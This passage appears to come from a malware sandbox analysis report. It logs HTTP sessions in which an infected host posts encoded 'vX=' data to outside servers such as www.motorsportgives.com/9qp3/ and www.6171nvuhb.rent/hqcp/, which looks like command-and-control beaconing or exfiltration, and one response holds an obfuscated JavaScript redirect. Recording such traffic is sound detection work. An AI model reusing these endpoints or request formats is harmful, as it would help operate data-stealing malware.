                                                            Data Ascii: vX=X5xwEotSV/RSUn7XtqP0msr1tcvctB07yCT4GftaD8O1yjKg4a6ViF+bwA/tcylFwfOcatGb69/lq/HrGWjjJR7CtKVPfmNFmEkNR0BK4rJn+wmZljnmR2WkdYrhOMfX+ImIQglfy+2L3lQ9Bubz/VAvnZjNiK2AIi89eo2uTLNJRtzNr3GVeqkSm3UZBOe/Cw4aenTQR1LGjiSplXZ1H1lMH/46Yt3ApLXStI9UtDcc0oaUGL6oAMjtOVDLCu6AYZzl7MnxoYIaA2VXmYxagLpOIVLMsnHTeJYDUZgXbBUGzUkh3NGrb0HBseDKaAsq2neFLozpiPSwQ+Zbu+oAZKUNo9hb3SRHy/8FbPIkavwKi+bSTyu2yXJrCP5AAQgm0HRjQiLnmlaLG3EpGI7BjDG/rbCLcAtCnPZr9MMDvY7S8GVbkq4e0JncUJk79Kz40DMHdwwpP3j6W2Opj1Vi3gNgjdm+DaoFFdGOOV1ix+PZvV1JaAm6v+T11e9lGJTki6xjtLt8ytjJvFb20mwJAZLCj+D29IuqglmIHNpLMiEebe4Dqp+O/IiXVUlBX+jaEUXTDCwQCxoO5RdqgYedSNjx288kTRHF1zoRfxaglzcZTCf1OlJ0YGQbXgTI6FB/FnOkRf6w1cZ7hGJ3ht1jWnRzhBWLtx+NPRy+owDpGkyR7XCoVlNmXDez81U/JmNPYQCQNkcKV0UoZdOvV/Q5KRxtPbWFtamEDvkM4NH1fTwYgjfzBsNnOVSqqevioRiPfZr0RO8aagkSowbhenGyMla+Jz+yME7MEYK/2LbxsuPHpybQWTGI2jm/DL8Gtl+bT1tbaS9BDZ9+RbbOe8AN6K/7pplL6vM1/rQz0a2VbYl07bz6OXsVhyf+abAoGhry7jiBDXG2aAz6HMGzow+6jY4/CNVhTnxsp91yfZDlYIqigH30SauR3QkTdfocegPgqcDMlsw5/Dc6Iwp6pbQ7pJYR8x9YQWoUOcElnYTvUpHvgCae9 [TRUNCATED]
                                                            Jul 3, 2024 17:41:31.874834061 CEST5156OUTData Raw: 39 73 36 6f 54 38 74 76 4c 54 63 46 68 69 4f 30 7a 6b 47 4f 56 66 76 59 36 6b 39 4e 4e 46 68 61 34 67 4e 42 5a 69 54 42 6c 33 59 67 79 48 72 77 2f 39 50 6c 31 32 55 48 77 43 57 34 57 67 4b 77 71 65 76 79 52 66 75 78 52 43 79 32 54 33 32 44 52 32
                                                            Data Ascii: 9s6oT8tvLTcFhiO0zkGOVfvY6k9NNFha4gNBZiTBl3YgyHrw/9Pl12UHwCW4WgKwqevyRfuxRCy2T32DR237Y4aR3IY1eNgidGMXiXfTSoypK45OyIOUkhm7F0V8/kDytJEh2Chna54ivrhdmvYih2l4WMMWIsHlE0SY9EyEr7SfJ+8mCUjub0rey85mAoLy6JVXLuzm15h/2GJA5tD0jMjCRow6a8z8zKmXcOiitqzR845RJy9
                                                            Jul 3, 2024 17:41:31.874917030 CEST5156OUTData Raw: 47 63 33 43 34 45 4b 34 65 41 70 6d 33 55 2f 6e 53 48 57 4e 46 41 63 54 75 66 47 39 65 32 6a 62 57 6b 77 6e 56 36 36 51 64 53 4c 66 41 46 4c 5a 33 54 77 61 59 4d 6a 44 57 49 69 52 30 46 38 68 64 75 35 50 68 54 5a 58 75 37 46 32 63 75 69 55 6f 47
                                                            Data Ascii: Gc3C4EK4eApm3U/nSHWNFAcTufG9e2jbWkwnV66QdSLfAFLZ3TwaYMjDWIiR0F8hdu5PhTZXu7F2cuiUoGIvZmdYe+SPrvJtUcAg8ozHc5liuOmgk+yuG2tIAxCk4alNA2CQOOtp+T2S0hxjASarkDs2E0PsxClcnUbxS90R1QTOrA7GnN6IjTZE+RUppJ+IJYq8wxbpzXE7DSMMPCA+usYDcGkS+A9sv5LJ+eb/OWmxrnH1dG3
                                                            Jul 3, 2024 17:41:32.043472052 CEST2578OUTData Raw: 4b 4d 6b 70 58 2b 4a 57 72 30 68 52 4b 53 6e 72 72 6a 4a 48 72 30 68 72 6f 4e 4e 78 36 7a 78 4f 6f 74 2f 65 50 49 46 30 44 56 78 6a 6f 54 31 71 4b 58 61 56 32 36 44 47 7a 59 78 43 34 55 61 54 4d 35 32 77 64 2f 58 55 50 73 71 38 59 34 38 31 64 4f
                                                            Data Ascii: KMkpX+JWr0hRKSnrrjJHr0hroNNx6zxOot/ePIF0DVxjoT1qKXaV26DGzYxC4UaTM52wd/XUPsq8Y481dOPbbfIG/OCrhj14ZbAcXtPTqMIDu16x+5pyZedwzrZml+7JzNgJSbtwbK5quIfJ1NMA9NT1VxvQP6l5v0M/C/0uZBJyPpBQ4y08WCWqGNsCgsZ/mAVBjVspMAwMZYlQ8MGc76cJ6PwwF/Iyn5vKLpWgBpiN9IZ9xry
                                                            Jul 3, 2024 17:41:32.043494940 CEST2578OUTData Raw: 69 6b 34 36 5a 31 79 56 6d 79 75 2f 4d 78 64 44 6d 2f 62 4a 73 53 37 42 50 62 46 79 54 4b 37 46 57 73 4a 42 2b 4e 4b 50 2f 35 56 69 32 49 6a 44 65 59 6b 33 32 77 52 2b 51 67 52 54 76 37 71 77 7a 6c 76 45 30 69 6a 61 44 6e 68 50 71 4b 44 52 68 31
                                                            Data Ascii: ik46Z1yVmyu/MxdDm/bJsS7BPbFyTK7FWsJB+NKP/5Vi2IjDeYk32wR+QgRTv7qwzlvE0ijaDnhPqKDRh1lCD1NnQ0xVBU83JTCINK+Qx+/g4jIvA4jLI1OCwF6S6C25DNvvejJ4JpGwL05N/BqVgtUkufiDpCHugURijPn53WVzsVUfndRjLcMS5Q1PnPU0MzCvTZWmXY5DK0sr82mMCNslcoiOGGsZJS8VnclBiBV1B1sP23k
                                                            Jul 3, 2024 17:41:32.043742895 CEST2578OUTData Raw: 4b 43 50 53 62 64 72 67 4e 51 43 75 46 74 7a 5a 42 77 4b 77 57 36 6b 61 39 2b 68 2b 30 32 43 72 68 4c 75 34 4f 32 6d 34 68 62 71 41 73 59 4d 36 69 52 6c 78 4b 76 64 34 4d 6c 4a 53 6d 33 71 58 39 52 6f 4d 6d 62 75 51 48 4c 73 73 57 6b 68 4a 6b 62
                                                            Data Ascii: KCPSbdrgNQCuFtzZBwKwW6ka9+h+02CrhLu4O2m4hbqAsYM6iRlxKvd4MlJSm3qX9RoMmbuQHLssWkhJkbFqehSlrVuN52v9VRs9YHXIPuU5LikyOQWg5fO+U8cx/F3XaJgxcQQgLtAbsxR/+d4RvPOuOYFGQRpoe0TShaLZjDMhXedc1rujxngGuAbyPz9RWEs+TsK1MD2IERnt4jVwCikEf9B9H/xwTxEPUniLXagw+k5kngU
                                                            Jul 3, 2024 17:41:32.043915987 CEST18046OUTData Raw: 66 54 4e 79 75 31 4f 44 41 4c 49 51 4f 32 52 56 34 69 43 37 4b 74 61 38 62 68 69 50 79 36 72 36 76 59 42 4e 62 42 32 72 6d 2f 74 6f 49 4f 46 6a 59 42 6b 54 66 41 6b 52 41 64 49 72 71 4b 38 77 4a 4c 49 58 63 58 78 4b 6f 6f 6c 6e 53 74 4a 6c 57 5a
                                                            Data Ascii: fTNyu1ODALIQO2RV4iC7Kta8bhiPy6r6vYBNbB2rm/toIOFjYBkTfAkRAdIrqK8wJLIXcXxKoolnStJlWZOmJKDs/gyGXbTfRGr1MM4SlYUrTfrLdDrDJUuaPRpXA7FDKpAdzKZE5OiuJ4vLUIsnNyLpY3lXO96Ges3ZAxEA2XQjp9VbPCn5c8j/37WMJYwCcmCFEDTy8nhL8qXuNfO4F7jhfqOY7096dJ/7hDS5n7/cUg706Oh
                                                            Jul 3, 2024 17:41:32.212369919 CEST2578OUTData Raw: 58 57 62 54 34 54 62 78 6c 57 31 74 79 73 75 49 59 65 72 49 49 6d 51 6a 6b 55 4d 4e 2b 6f 75 72 6f 46 51 66 38 7a 6e 45 75 79 4f 6e 34 4a 33 67 6d 44 76 35 53 79 4f 75 77 74 31 58 70 53 4e 39 41 70 30 32 48 34 54 31 7a 34 39 53 53 48 43 59 67 72
                                                            Data Ascii: XWbT4TbxlW1tysuIYerIImQjkUMN+ouroFQf8znEuyOn4J3gmDv5SyOuwt1XpSN9Ap02H4T1z49SSHCYgrZuFOdlskvTex5nQM9deusUic8ivZcQsR8Tcjxw2SgZCKJ9KAW77cNzLqWMxyvBCXXiULH/uGrNB3yFAvan63GlFn9/98Vt5BUx+mvohe+9pWcYy2LHYOAcbcEE7gbSTIuIg9H3O1uIswJEhXInKyCbd2kNZN+NrpK
                                                            Jul 3, 2024 17:41:32.212425947 CEST3867OUTData Raw: 45 6e 33 4d 62 38 6c 76 4d 71 7a 63 4e 75 4a 6c 59 31 48 63 4d 44 4d 65 65 59 7a 78 62 4d 30 57 78 68 71 61 4f 61 64 66 59 4b 32 34 34 35 2f 35 61 4b 50 4c 34 74 6d 44 75 35 46 4c 65 75 74 57 5a 6f 35 43 65 2b 2b 31 54 44 43 53 5a 4f 31 53 37 53
                                                            Data Ascii: En3Mb8lvMqzcNuJlY1HcMDMeeYzxbM0WxhqaOadfYK2445/5aKPL4tmDu5FLeutWZo5Ce++1TDCSZO1S7S3y7+2GcsQd34zXCx6lYORHV1f6AH3lRjGV6qHxDuNZCCSgepah+2IMqwX62DAMYWL1Sp+PTkp8E8d2WJ/3jw163JgfgIPf7WmMeEMkdGWiqiA4xicyqKSnk7F3nRfdeIq2jYVCjjH7omptjmatgRFZKLxuVN3be9a
                                                            Jul 3, 2024 17:41:32.212455034 CEST5156OUTData Raw: 47 78 38 61 6e 61 2f 30 7a 34 72 66 46 47 52 46 67 75 6e 2b 67 7a 75 62 52 59 6d 42 6d 45 65 4f 53 2f 56 49 4e 35 31 57 55 6f 51 79 42 74 62 45 42 37 63 54 31 6b 4e 75 49 4c 4c 6c 58 64 58 34 33 6e 46 55 4c 55 46 53 32 67 7a 35 53 73 37 69 79 67
                                                            Data Ascii: Gx8ana/0z4rfFGRFgun+gzubRYmBmEeOS/VIN51WUoQyBtbEB7cT1kNuILLlXdX43nFULUFS2gz5Ss7iygLXmjei8RF/V3e8689JaCJIoN77hAy02poNoDupVe5zp+uYJTEVmL9tieLS3+arME+pyXO9bMmsEVxGLxnCw/EWFKho80D6JVjr2wQelzOdYm0A/E8Y4J6GbaefsN/OEhn4S/ARmcEylIl+tQl9UKnoELU/bl/OL88
                                                            Jul 3, 2024 17:41:32.212621927 CEST1289OUTData Raw: 45 48 69 50 6f 48 68 74 45 78 31 32 52 53 55 47 71 57 33 4e 6f 30 34 53 2f 63 36 52 4a 38 62 70 58 7a 2f 69 65 62 43 43 37 67 6c 43 6f 2f 30 61 74 59 31 41 43 6e 62 56 6e 38 34 6b 43 73 67 59 43 76 33 71 31 51 56 72 73 52 46 34 4d 71 2b 59 63 75
                                                            Data Ascii: EHiPoHhtEx12RSUGqW3No04S/c6RJ8bpXz/iebCC7glCo/0atY1ACnbVn84kCsgYCv3q1QVrsRF4Mq+Ycu0sP7SKIkE8HQw+TNDeG2PvZ7OnepYf4mAYAjtYGgloeLZZN70O4Q3ZQuIcfqe7pgvqglLuIrcbl4sXSV1xroJPq3JIwShmsGgVQrSWU4ph9GhysXlTtDnM6MslN+TGMLlYk0DctXs4iUcBO4qzSZNFNRxQ96vuTvT
                                                            Jul 3, 2024 17:41:33.375262976 CEST715INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:41:33 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 66 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 53 dd 6f da 30 10 7f e7 af f0 fc 14 24 e2 7c 92 84 02 9d 80 81 d4 0e 51 4d a5 7d a1 11 72 1c a7 09 25 09 b2 9d 35 5b cb ff be cb c2 36 b4 ee b9 5a a4 cb f9 ce 77 f7 3b df c7 48 32 91 1d 14 62 29 15 92 ab 31 be 5b 2f f4 00 a3 2c 1e e3 e5 64 3b bb 59 2e e7 b3 35 46 52 b0 31 36 0c 19 3f 91 be 45 f6 d4 d8 49 1d 04 fd 20 4a 92 67 05 d9 49 7c 39 32 da 60 97 9d d1 e9 b0 9c 90 ac c8 94 f6 92 c5 17 d8 b9 9a ca fb 5b 61 d7 37 93 d9 d5 fd f5 1d ee b1 a7 7f 68 8f dd b7 71 3a 5f a9 40 db 34 57 68 dc b2 d7 57 b4 09 87 1d 2d a9 0a a6 b2 b2 d0 ba e8 a5 83 50 63 96 e6 60 14 97 ac ca 79 a1 08 13 9c 2a 3e df f3 46 d2 70 9b 17 ee 0e c1 38 cd 09 bc 0a 8c 71 aa d4 41 5e 18 06 68 22 9a c5 15 61 65 de 08 3b f9 31 30 4d c6 12 db 77 99 43 fb 03 87 3a 5e df e1 1e 65 51 12 c1 8d cf 70 13 a9 81 95 e7 a8 8f 5c 9d 20 e5 f4 db 9a 3e ae 68 ce ff 80 6f cc 70 88 c0 4d 92 03 15 90 d6 aa 8c 39 d4 49 72 a1 a6 3c 29 05 d7 d2 bc 87 24 24 79 ec 6a f0 3f ab c7 07 5d b7 74 fd 77 81 df a3 6d 9f [TRUNCATED]
                                                            Data Ascii: 1f2So0$|QM}r%5[6Zw;H2b)1[/,d;Y.5FR16?EI JgI|92`[a7hq:_@4WhW-Pc`y*>Fp8qA^h"ae;10MwC:^eQp\ >hopM9Ir<)$$yj?]twm^zXymoW"6|q.aqPs~JRJS8%aaIUf5k|6f@ z}jl@]i{s[".7i0`Hq!|(Y7B0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            53192.168.11.2049828142.202.6.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:34.589607954 CEST522OUTGET /hqcp/?vX=a7ZQHf8WLvhHVBvdkZq5xuKGtafV4VgGgVvybuFCKLHzqS2zk6yuhV6s1hLkbw5zmPfcdtbcw9raqNmLcm/5LDv7+9F7BWl1gWJ1Gl5m9d8a+w3Gr0PmHHU=&_B7=LxyxWrj8kri0gh HTTP/1.1
                                                            Host: www.6171nvuhb.rent
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Jul 3, 2024 17:41:35.763567924 CEST1283INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Wed, 03 Jul 2024 15:41:35 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            Data Raw: 34 34 32 0d 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 33 49 42 73 56 53 72 32 78 4f 41 43 49 56 4a 55 22 2c 63 6b 3a 22 33 49 42 73 56 53 72 32 78 4f 41 43 49 56 4a 55 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 38 30 30 63 63 66 32 37 34 63 33 61 35 39 33 61 33 36 35 33 65 36 61 63 62 66 62 30 30 63 37 63 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 [TRUNCATED]
                                                            Data Ascii: 442<script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"3IBsVSr2xOACIVJU",ck:"3IBsVSr2xOACIVJU"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script>...1--><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KQ2cxFS69unN6J8D",ck:"KQ2cxFS69unN6J8D"})</script><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac6"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script><script> var url = "https://aaa.za1.jecxs.cn/123.html"; var _0x0 = ["\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x68\x72\x65\x66"]; s [TRUNCATED]


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            54192.168.11.204982974.208.236.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:40.953568935 CEST803OUTPOST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 199
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 5a 5a 4d 41 78 34 66 34 53 44 72 53 56 7a 44 56 63 2b 4f 30 4b 6a 44 75 46 58 6e 73 79 2f 41 54 6e 7a 61 6c 49 73 67 5a 56 45 6b 56 7a 4b 68 58 36 33 4a 79 65 7a 51 79 73 43 78 69 4e 30 79 35 6e 6d 46 47 63 4e 35 66 61 76 59 38 5a 56 2f 38 64 32 31 78 6a 65 47 59 2f 61 30 4a 4b 75 41 59 46 31 54 4a 49 66 7a 72 32 51 67 75 44 46 70 6d 33 43 6a 7a 77 4b 75 39 50 64 35 76 45 6a 6d 46 50 63 73 2f 38 57 68 39 46 5a 53 7a 33 39 73 49 37 4f 51 77 6a 56 52 31 35 68 73 78 75 34 4a 43 33 45 4b 76 77 6b 72 69 6d 49 4c 77 43 2b 6d 69 33 58 4a 68 6f 67 3d 3d
                                                            Data Ascii: vX=UXwO7QGHJMKTZZMAx4f4SDrSVzDVc+O0KjDuFXnsy/ATnzalIsgZVEkVzKhX63JyezQysCxiN0y5nmFGcN5favY8ZV/8d21xjeGY/a0JKuAYF1TJIfzr2QguDFpm3CjzwKu9Pd5vEjmFPcs/8Wh9FZSz39sI7OQwjVR15hsxu4JC3EKvwkrimILwC+mi3XJhog==
                                                            Jul 3, 2024 17:41:41.092703104 CEST580INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:41 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            55192.168.11.204983074.208.236.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:43.646683931 CEST1143OUTPOST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 539
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
                                                            Data Raw: 76 58 3d 55 58 77 4f 37 51 47 48 4a 4d 4b 54 59 35 63 41 39 35 66 34 56 6a 72 52 4a 44 44 56 53 65 4f 77 4b 6a 2f 75 46 57 79 78 79 4e 55 54 6e 57 2b 6c 4a 74 67 5a 59 6b 6b 56 6e 61 67 64 6c 6e 4a 70 65 7a 4d 51 73 41 6c 69 4e 77 53 35 6c 55 39 47 64 39 35 65 55 50 59 7a 52 31 2f 35 4b 6d 30 2b 6a 65 4c 78 2f 59 49 4a 4a 64 30 59 45 7a 48 4a 43 74 62 6f 79 77 67 6f 53 56 70 6c 38 69 6a 39 77 4b 54 41 50 5a 35 2f 46 51 36 46 50 38 4d 2f 39 57 68 2b 4c 70 53 30 2f 64 74 6b 36 65 52 48 73 45 52 69 2b 77 59 32 68 72 78 6d 30 48 71 77 34 47 66 52 35 59 65 4d 47 4e 37 65 6a 33 45 2b 32 4e 74 48 6b 4c 58 4b 2b 54 6d 38 54 6a 4c 2b 65 77 68 31 4d 4f 47 57 77 33 4d 6d 6b 67 43 4a 32 53 4b 69 6a 45 64 67 31 67 79 63 4d 4e 74 4b 45 69 4e 6a 62 42 62 72 66 61 70 7a 72 6f 4b 34 64 48 48 4e 5a 55 4d 6b 63 51 49 4f 75 6a 74 6c 66 33 41 38 62 67 2f 38 57 78 56 71 71 5a 62 41 48 67 6c 77 41 71 46 39 47 67 58 7a 55 79 46 36 51 36 39 57 6a 43 62 51 39 54 54 2b 61 62 7a 6e 4c 6f 4a 53 6e 6d 77 45 2f 42 49 75 4e 2b 57 [TRUNCATED]
                                                            Data Ascii: vX=UXwO7QGHJMKTY5cA95f4VjrRJDDVSeOwKj/uFWyxyNUTnW+lJtgZYkkVnagdlnJpezMQsAliNwS5lU9Gd95eUPYzR1/5Km0+jeLx/YIJJd0YEzHJCtboywgoSVpl8ij9wKTAPZ5/FQ6FP8M/9Wh+LpS0/dtk6eRHsERi+wY2hrxm0Hqw4GfR5YeMGN7ej3E+2NtHkLXK+Tm8TjL+ewh1MOGWw3MmkgCJ2SKijEdg1gycMNtKEiNjbBbrfapzroK4dHHNZUMkcQIOujtlf3A8bg/8WxVqqZbAHglwAqF9GgXzUyF6Q69WjCbQ9TT+abznLoJSnmwE/BIuN+WGjYzDqKtgR/4wsYh4Fdt2S1LvQwaRUPXjsllS6LMgjXmPOK30ZOIAk9ocSmzRrGVQDm5t5dudLgB63+3pXMERzHpZp9+nnzNuosPluCplePUWg75DkHpkzNtHbzZzrcyVdWoPWXq7vJ220bX5gIQkshLPrGX7uh2elfSDzgKbPNpapc92LZAPCgTDrFJN0SNN7QwcQ+I=
                                                            Jul 3, 2024 17:41:43.791742086 CEST580INHTTP/1.1 404 Not Found
                                                            Content-Type: text/html
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Date: Wed, 03 Jul 2024 15:41:43 GMT
                                                            Server: Apache
                                                            Content-Encoding: gzip
                                                            Data Raw: 31 38 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 7d 51 4b 4f e3 30 10 be f7 57 cc 7a 0f 9c 1c 37 94 43 9b 26 1c b6 ad b4 48 85 45 28 88 e5 68 62 b7 b1 e4 78 82 33 21 0d bf 1e 27 e5 b1 20 b4 27 8f ed ef 31 f3 4d fa 63 fd 67 95 df 5f 6f a0 a4 ca c2 f5 ed af ed c5 0a 18 17 e2 6e b6 12 62 9d af e1 ef ef fc 72 0b 71 34 85 dc 4b d7 18 32 e8 a4 15 62 73 c5 26 ac 24 aa 13 21 ba ae 8b ba 59 84 7e 2f f2 1b 71 18 b4 e2 81 fc 5a 72 fa 87 19 29 52 ec 7c 92 8e 86 56 ba 7d c6 b4 63 70 a8 6c f2 e9 e6 9a ec 1b f9 78 b1 58 1c 55 83 06 a4 a5 96 2a 9c 90 92 21 ab 87 0a 36 de a3 87 b3 e9 19 70 b8 42 82 1d b6 4e 0d 10 f1 8e 49 2b 4d 12 0a 74 a4 1d 65 8c f4 81 c4 d0 ce 12 8a 52 fa 46 53 d6 d2 8e cf 59 08 85 6a ae 1f 5b f3 94 b1 d5 11 ce f3 be d6 83 37 7c 51 71 c8 0b 59 94 fa 33 6b 7c e2 83 95 47 3b b6 2c 5e 7b 4e 1f 50 f5 d0 50 6f 75 c6 76 01 c0 77 b2 32 b6 4f a4 37 d2 2e 8f 16 65 fc 86 28 d0 a2 4f 7e 4e e5 ec 74 5e 2c 47 7c 63 9e 75 12 16 a3 ab 23 fa 3f a3 97 f1 d8 71 fd a6 f6 c1 9f 46 f3 77 fe 3d b6 1e 1e 3c 76 8d f6 50 48 [TRUNCATED]
                                                            Data Ascii: 189}QKO0Wz7C&HE(hbx3!' '1Mcg_onbrq4K2bs&$!Y~/qZr)R|V}cplxXU*!6pBNI+MteRFSYj[7|QqY3k|G;,^{NPPouvw2O7.e(O~Nt^,G|cu#?qFw=<vPHw3Nmy2nzlB8`a1l`mur0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            56192.168.11.204983174.208.236.23080
                                                            TimestampBytes transferredDirectionData
                                                            Jul 3, 2024 17:41:46.335351944 CEST1289OUTPOST /9qp3/ HTTP/1.1
                                                            Host: www.motorsportgives.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.5
                                                            Accept-Encoding: gzip, deflate, br
                                                            Origin: http://www.motorsportgives.com
                                                            Referer: http://www.motorsportgives.com/9qp3/
                                                            Content-Length: 52927
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Cache-Control: max-age=0
                                                            User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.59.10 (KHTML, like Gecko) Version/5.1.9 Safari/534.59.10
